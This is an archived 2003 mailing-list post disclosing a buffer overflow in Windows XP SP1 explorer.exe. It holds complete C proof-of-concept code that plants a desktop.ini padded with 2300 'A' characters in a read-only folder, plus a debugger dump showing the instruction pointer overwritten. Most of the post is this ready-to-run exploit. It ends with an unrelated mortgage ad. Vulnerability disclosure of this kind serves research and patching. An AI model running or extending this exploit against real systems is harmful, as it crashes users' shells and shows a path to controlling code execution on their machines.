This bug allow a malicious an attacker to execute data with privileges of a user that is browsing the hard disk with explorer. tested against winxp SP1 example code provided. /* Buffer Overflow in explorer.exe - Proof of Concept Tested only against: Windows XP SP1 Found by aT4rat_private Saludos a: - #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }: - #localhost and #darknet Usage: just execute this file. This code will crash your explorer every time you try to browse your harddisk execute this program again to delete the evil file ;-) (3ec.464): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 edi=000ece90 eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 00410041 ?? ??? 3W Design Security 2003. http://www.3WDesign.es/ */ #include <direct.h> #include <stdio.h> #include <windows.h> #include <sys/stat.h> #define BUFF 2300 void main(){ char path[256]; char evil[BUFF+1]=""; FILE *bof; struct stat st; printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .. ...: \tProof of Concept (aT4rat_private)\t:... .. .\n\n"); strcpy(path,"\\aT4r[at]3WDesign.es Security"); mkdir(path); SetFileAttributes(path,FILE_ATTRIBUTE_READONLY); strcat(path,"\\desktop.ini"); if (stat(path,&st)==0) { remove(path); exit(1);}//just execute this program twice to remote this file :P bof=fopen(path,"w"); fputs("[.ShellClassInfo]\n",bof); memset(evil,'A',BUFF); fputs(evil,bof); fclose(bof); printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path); } _________________________________________________________________ Hipotecas para todos los bolsillos con MSN Money. http://money.msn.es/hipotecas/default.asp
This archive was generated by hypermail 2b30 : Thu May 08 2003 - 09:12:00 PDT